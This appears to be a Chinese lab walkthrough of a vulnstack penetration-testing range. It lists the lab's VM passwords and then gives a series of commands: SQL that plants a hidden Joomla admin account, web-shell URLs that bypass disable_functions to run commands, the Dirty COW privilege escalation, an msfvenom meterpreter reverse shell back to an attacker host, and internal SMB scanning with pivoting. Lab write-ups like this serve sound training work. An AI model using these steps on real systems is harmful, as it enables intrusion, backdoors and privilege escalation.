靶机下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/5/
wp参考 https://www.cnblogs.com/wkzb/p/13281772.html
我的机器上如果所有虚拟机都按照原定内存的话内存不够,所以为了缩减内存,只能先看最后找密码了5555
1
2
3
| win7 123qwe!ASD
08 123qwe!ASD
win10 zxcASDqw123!!
|
要开启nginx服务,直接执行nginx命令即可(原本是开着的,可是改内存需要关机)
1
2
3
4
5
6
| INSERT INTO `am2zu_users`
(`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('Administrator2', 'admin2',
'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`)
VALUES (LAST_INSERT_ID(),'8');
|
https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
http://172.16.45.136/templates/beez3/bypass_disablefunc.php?cmd=whoami&outpath=/tmp/baji&sopath=/var/www/html/templates/beez3/bypass_disablefunc_x64.so
http://172.16.45.136/templates/beez3/bypass_disablefunc.php?cmd=ifconfig&outpath=/tmp/baji&sopath=/var/www/html/templates/beez3/bypass_disablefunc_x64.so
http://172.16.45.136/templates/beez3/bypass_disablefunc.php?cmd=cat%20/proc/version&outpath=/tmp/baji&sopath=/var/www/html/templates/beez3/bypass_disablefunc_x64.so
gcc -pthread dirty.c -o dirty -lcrypt
su firefart/baji
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=4444 -f elf > shell.elf
1
2
3
| msfconsole>set payload linux/x86/meterpreter/reverse_tcp
msfconsole>set lhost 172.16.45.129
msfconsole>set lport 4444
|
run autoroute -s 192.168.93.0/24
background
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.93.0/24
exploit
192.168.93.10 2012
192.168.93.20 2008
192.168.93.30 7
爆破2008密码这块出问题了,总是readtimeout,先参考其它大师傅的结果吧,Windows 2008密码为123qwe!ASD